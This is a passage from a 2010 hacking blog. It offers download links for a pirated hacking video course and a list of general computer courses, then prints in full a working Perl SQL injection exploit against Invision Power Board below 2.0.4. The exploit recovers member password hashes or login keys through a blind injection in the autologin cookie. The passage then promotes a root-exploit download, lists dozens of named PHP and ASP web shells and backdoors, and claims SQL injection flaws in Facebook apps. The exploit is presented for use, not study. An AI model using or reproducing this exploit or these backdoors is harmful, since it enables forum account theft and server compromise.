Senin, 25 Oktober 2010

The Hack-Counter Hack Training Course




The Hack-Counter Hack Training Course | English | RS | HF | ULD | 999MB

* Combination of talking-head video, slideshow presentation and video capture of actual screen shots
* Walks through setting up "lab" environment and then experimenting with tools on lab PC's
* Includes suite of hacker / security tools for both Windows and Linux platforms on CD
* Requires RealOne Player (freely available) because video presentation is in RealVideo format
* Good program to use in combination with Ed Skoudis' book: Counter Hack
* Mainly for beginners but may even provide some new tricks to seasoned gurus

CD1 Content
Session 1
# Understand the Purpose of the Course and the Phases of Hacking
# Acquire the Hardware and Software for Your Laboratory
# Build the Windows® 2000/XP Hacker Tool Analysis Laboratory
# Build the Linux Hacker Tool Analysis Laboratory
# Test Your Laboratory and Keep It Secure

Session 2
# Understand Low-Tech and Computer-Based Reconnaissance
# Use Sam Spade to Gather Information About Target
# Search the Web for Interesting Target Information

Session 3
# Understand Scanning Techniques
# Search for Modems Using THC-Scan
# Develop a Network Map Using Cheops-ng
# Conduct a Port Scan Using Nmap
# Scan for Vulnerabilities Using Nessus

CD2 Content
Session 4
# Analyze Buffer Overflows
# Passwords on Windows® and Linux
# Sniff Data from the Network Using Sniffit
# Use Netcat, the Swiss Army Knife™ of Hacker Tools

Session 5
# Analyze an Application-Level Trojan Horse Backdoor (VNC)
# Analyze a Traditional RootKit (LRK4)
# Analyze a Kernel-Level RootKit (Kernel Intrusion System)

Session 6
# Understand File Hiding in Windows®
# Understand File Hiding in UNIX
# Analyze Protocol Tunneling Using Reverse WWW Shell
# Analyze Covert Channels Using Covert_TCP



Download HotFile:
http://hotfile.com/dl/30681801/c9fcb36/Hack_Training_Video_Course_CD1.part1.rar.html
http://hotfile.com/dl/30681797/d5e1308/Hack_Training_Video_Course_CD1.part2.rar.html
http://hotfile.com/dl/30681886/749794e/Hack_Training_Video_Course_CD1.part3.rar.html
http://hotfile.com/dl/30681922/eb4db58/Hack_Training_Video_Course_CD1.part4.rar.html
http://hotfile.com/dl/30681925/56c9598/Hack_Training_Video_Course_CD1.part5.rar.html
http://hotfile.com/dl/30681926/c779bb9/Hack_Training_Video_Course_CD2.part1.rar.html
http://hotfile.com/dl/30681927/641f59a/Hack_Training_Video_Course_CD2.part2.rar.html
http://hotfile.com/dl/30681929/4a846b2/Hack_Training_Video_Course_CD2.part3.rar.html
http://hotfile.com/dl/30681931/22d7125/Hack_Training_Video_Course_CD2.part4.rar.html
http://hotfile.com/dl/30681935/6bc0a6c/Hack_Training_Video_Course_CD2.part5.rar.html

Download Sharingmatrix:
http://sharingmatrix.com/file/1996263/Hack Training Video Course CD1.part1.rar
http://sharingmatrix.com/file/1996255/Hack Training Video Course CD1.part2.rar
http://sharingmatrix.com/file/1996335/Hack Training Video Course CD1.part3.rar
http://sharingmatrix.com/file/1996345/Hack Training Video Course CD1.part4.rar
http://sharingmatrix.com/file/1996337/Hack Training Video Course CD1.part5.rar
http://sharingmatrix.com/file/1996383/Hack Training Video Course CD2.part1.rar
http://sharingmatrix.com/file/1996385/Hack Training Video Course CD2.part2.rar
http://sharingmatrix.com/file/1996389/Hack Training Video Course CD2.part3.rar
http://sharingmatrix.com/file/1996391/Hack Training Video Course CD2.part4.rar
http://sharingmatrix.com/file/1996387/Hack Training Video Course CD2.part5.rar

Download Uploading:
http://uploading.com/files/f6773cf1/Hack%2BTraining%2BVideo%2BCourse%2BCD1.part1.rar/
http://uploading.com/files/ec19fem3/Hack%2BTraining%2BVideo%2BCourse%2BCD1.part2.rar/
http://uploading.com/files/2647f23c/Hack%2BTraining%2BVideo%2BCourse%2BCD1.part3.rar/
http://uploading.com/files/3mcmm1b4/Hack%2BTraining%2BVideo%2BCourse%2BCD1.part4.rar/
http://uploading.com/files/48bm6faf/Hack%2BTraining%2BVideo%2BCourse%2BCD1.part5.rar/
http://uploading.com/files/fm216f43/Hack%2BTraining%2BVideo%2BCourse%2BCD2.part1.rar/
http://uploading.com/files/cma4d258/Hack%2BTraining%2BVideo%2BCourse%2BCD2.part2.rar/
http://uploading.com/files/c77429c7/Hack%2BTraining%2BVideo%2BCourse%2BCD2.part3.rar/
http://uploading.com/files/14575adf/Hack%2BTraining%2BVideo%2BCourse%2BCD2.part4.rar/
http://uploading.com/files/bd554e37/Hack%2BTraining%2BVideo%2BCourse%2BCD2.part5.rar/

Download Rapidshare:
http://rapidshare.com/files/357416955/Hack_Training_Video_Course_CD1.part1.rar.html
http://rapidshare.com/files/357416872/Hack_Training_Video_Course_CD1.part2.rar.html
http://rapidshare.com/files/357417783/Hack_Training_Video_Course_CD1.part3.rar.html
http://rapidshare.com/files/357417977/Hack_Training_Video_Course_CD1.part4.rar.html
http://rapidshare.com/files/357418131/Hack_Training_Video_Course_CD1.part5.rar.html
http://rapidshare.com/files/357418360/Hack_Training_Video_Course_CD2.part1.rar.html
http://rapidshare.com/files/357418252/Hack_Training_Video_Course_CD2.part2.rar.html
http://rapidshare.com/files/357418247/Hack_Training_Video_Course_CD2.part3.rar.html
http://rapidshare.com/files/357418298/Hack_Training_Video_Course_CD2.part4.rar.html
http://rapidshare.com/files/357418267/Hack_Training_Video_Course_CD2.part5.rar.html
Regards,
Adnan Anjum From http://hackguide4u.blogspot.com

Minggu, 24 Oktober 2010

Tutorials

Courses

All Computer Courses
Ms Office
Adobe Photoshop
Adobe Flash
Corel Draw
Inpage Urdu
Adobe Premier
Adobe PageMaker
BlueVoda
Dreamviewer

All Courses Here in Zip and Document and Notes Formats

Watch Tips Tricks Here


Adobe Flash Course and Contents Download Here

Networking

Programming

PHP Urdu Tutorial


Sabtu, 23 Oktober 2010

Invision Power Board SQL injection exploit by RST/GHC

#!/usr/bin/perl

## Invision Power Board SQL injection exploit by RST/GHC
## vulnerable forum versions : 1.* , 2.* (&lt2.0.4)
## tested on version 1.3 Final and version 2.0.2
## * work on all mysql versions
## * work with magic_quotes On (use %2527 for bypass magic_quotes_gpc = On)
## (c)oded by 1dt.w0lf
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## screen:
## ~~~~~~~
## r57ipb2.pl blah.com /ipb13/ 1 0
## [~]    SERVER : blah.com
## [~]      PATH : /ipb13/
## [~] MEMBER ID : 1
## [~]    TARGET : 0 - IPB 1.*
## [~] SEARCHING PASSWORD ... [ DONE ]
##
## MEMBER ID : 1
## PASSWORD : 5f4dcc3b5aa765d61d8327deb882cf99
##
## r57ipb2.pl blah.com  /ipb202/ 1 1
## [~]    SERVER : blah.com
## [~]      PATH : /ipb202/
## [~] MEMBER ID : 1
## [~]    TARGET : 1 - IPB 2.*
## [~] SEARCHING PASSWORD ... [ DONE ]
##
## MEMBER ID : 1
## MEMBER_LOGIN_KEY : f14c54ff6915dfe3827c08f47617219d
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## Greets: James Bercegay of the GulfTech Security Research Team
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## Credits: RST/GHC , http://rst.void.ru , http://ghc.ru
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

use IO::Socket;

if (@ARGV &lt 4) { &usage; }

$server    = $ARGV[0];
$path      = $ARGV[1];
$member_id = $ARGV[2];
$target    = $ARGV[3];

$pass = ($target)?('member_login_key'):('password');

$server =~ s!(http:\/\/)!!;

$request  = 'http://';
$request .= $server;
$request .= $path;

$s_num = 1;
$|++;
$n = 0;

print "[~]    SERVER : $server\r\n";
print "[~]      PATH : $path\r\n";
print "[~] MEMBER ID : $member_id\r\n";
print "[~]    TARGET : $target";
print (($target)?(' - IPB 2.*'):(' - IPB 1.*'));
print "\r\n";
print "[~] SEARCHING PASSWORD ... [|]";

($cmember_id = $member_id) =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;

while(1)
{
if(&found(47,58)==0) { &found(96,122); }
$char = $i;
if ($char=="0")
 {
 if(length($allchar) &gt 0){
 print qq{\b\b DONE ]

 MEMBER ID : $member_id
 };
 print (($target)?('MEMBER_LOGIN_KEY : '):('PASSWORD : '));
 print $allchar."\r\n";
 }
 else
 {
 print "\b\b FAILED ]";
 }
 exit();
 }
else
 {
  $allchar .= chr(42);
 }
$s_num++;
}

sub found($$)
 {
 my $fmin = $_[0];
 my $fmax = $_[1];
 if (($fmax-$fmin)&lt5) { $i=crack($fmin,$fmax); return $i; }

 $r = int($fmax - ($fmax-$fmin)/2);
 $check = " BETWEEN $r AND $fmax";
 if ( &check($check) ) { &found($r,$fmax); }
 else { &found($fmin,$r); }
 }

sub crack($$)
 {
 my $cmin = $_[0];
 my $cmax = $_[1];
 $i = $cmin;
 while ($i&lt$cmax)
  {
  $crcheck = "=$i";
  if ( &check($crcheck) ) { return $i; }
  $i++;
  }
 $i = 0;
 return $i;
 }

sub check($)
 {
 $n++;
 status();
 $ccheck = $_[0];
 $pass_hash1 = "%36%36%36%2527%20%4F%52%20%28%69%64%3D";
 $pass_hash2 = "%20%41%4E%44%20%61%73%63%69%69%28%73%75%62%73%74%72%69%6E%67%28";
 $pass_hash3 = $pass.",".$s_num.",1))".$ccheck.") /*";
 $pass_hash3 =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
 $nmalykh    = "%20%EC%E0%EB%FB%F5%20%2D%20%EF%E8%E4%E0%F0%E0%F1%21%20";
 $socket = IO::Socket::INET-&gtnew( Proto =&gt "tcp", PeerAddr =&gt "$server", PeerPort =&gt "80");

 printf $socket ("GET %sindex.php?act=Login&CODE=autologin HTTP/1.0\nHost: %s\nAccept: */*\nCookie: member_id=%s; pass_hash=%s%s%s%s%s\nConnection: close\n\n",
 $path,$server,$cmember_id,$pass_hash1,$cmember_id,$pass_hash2,$pass_hash3,$nmalykh);

 while(&lt$socket&gt)
  {
  if (/Set-Cookie: session_id=0;/) { return 1; }
  }

 return 0;
 }

sub status()
{
  $status = $n % 5;
  if($status==0){ print "\b\b/]";  }
  if($status==1){ print "\b\b-]";  }
  if($status==2){ print "\b\b\\]"; }
  if($status==3){ print "\b\b|]";  }
}

sub usage()
 {
 print q(
 Invision Power Board v &lt 2.0.4 SQL injection exploit
 ----------------------------------------------------
 USAGE:
 ~~~~~~
 r57ipb2.pl [server] [/folder/] [member_id] [target]

 [server]    - host where IPB installed
 [/folder/]  - folder where IPB installed
 [member_id] - user id for brute

 targets:
          0 - IPB 1.*
          1 - IPB 2.* (Prior To 2.0.4)

 e.g. r57ipb2.pl 127.0.0.1 /IPB/ 1 1
 ----------------------------------------------------
 (c)oded by 1dt.w0lf
 RST/GHC , http://rst.void.ru , http://ghc.ru
 );
 exit();
 }



2007-2008-2009-2010-2011 local r00t exploit Click Download !

2007-2008-2009-2010-2011 local r00t exploit Click Download !

http://www.uploaded.to/file/kwirm4

All Good shells which hard to find

Zone .PL

Mass .PL

ka0s_over .PL

c99 Shell

c100 Shell

r57 2.0 Shell

r57 1.40 Shell

BLaSTER Kral Shell

Lolipop Shell

iskorpitx Shell

ASPydrv Shell

Cpanel Shell

Efso Shell

Ex0 Shell

Megabor Shell

Root Shell

ZX Shell

Small Shell

SpyGrup Shell

Telnet

Zehir4 Shell

Soldier of allah Shell

Magiccoder Shell

Zaco Shell

Stress Shell

Sosyete Shell

Simattacker

Safe0ver

NST Shell

FTP Search

Erne Shell

Cyber Warrior Shell

Tool Asp Shell

Beyaz_Hacker Shell

c100 Unlimited Shell

Angel Shell

Tryag Shell

Fatal Shell

Sosyete Shell

safe0ver Shell

5.2.9 PHP Shell

Zaco Shell

Worse Linux Shell

WinX Shell

Uploader Shell

Sniper Sa Shell

Sim Shell

Simple CMD Shell

Simple PHP Backdoor Shell

Safe Mode Bypass Shell

S72 Shell

Ru24 Post Shell

Rootshell

PWS Shell

Private I2Lue Shell

CPHP Remote View Shell

PHP Jackal Shell

PHP Include-W Shell

PHP Backdoor Shell

Phantasma Shell

PH Vayv Shell

Nst View Shell

Nix Remote Shell

Network File Manager Shell

Ncc Shell

Mysql Tool Shell

Mysql Shell

Mysql Web Interface 0.8 Shell

Mysql Interface v1.0 Shell

My Shell

Moroccan Spamers Shell

Matamu Shell

Load Shell

Liz0zim Shell

Lama Shell

Kadot Universal Shell

Jsp Shell

Iron Shell

Hxps Shell

H4ntu Shell

GFS-SH Shell

GFS-Ver Shell

Dx Shell

DTool Pro Shell

Dive 1.0 Shell

Dc3 Security Crew Shell

Cyber Shell

CTT Shell

Crystal Shell

Backup Sql Shell

Azrail PHP Shell

Ayyildiz Shell

Antichat Shell

Ajax PHP Command Shell

Minggu, 03 Oktober 2010

Hack some facebook apps (apps.facebook.com vulnerable to SQL and html Injection )

 From Adnan Anjum Founder Of http://hackguide4u.blogspot.com
This is very strange think facebook have sql vulnerability





 Some info for all of you injector team broke facebook code
Special Thanks To TeAM inj3ct0r
Part 1 Original: http://inj3ct0r.com/exploits/11638
Part 2 Original: http://inj3ct0r.com/exploits/13403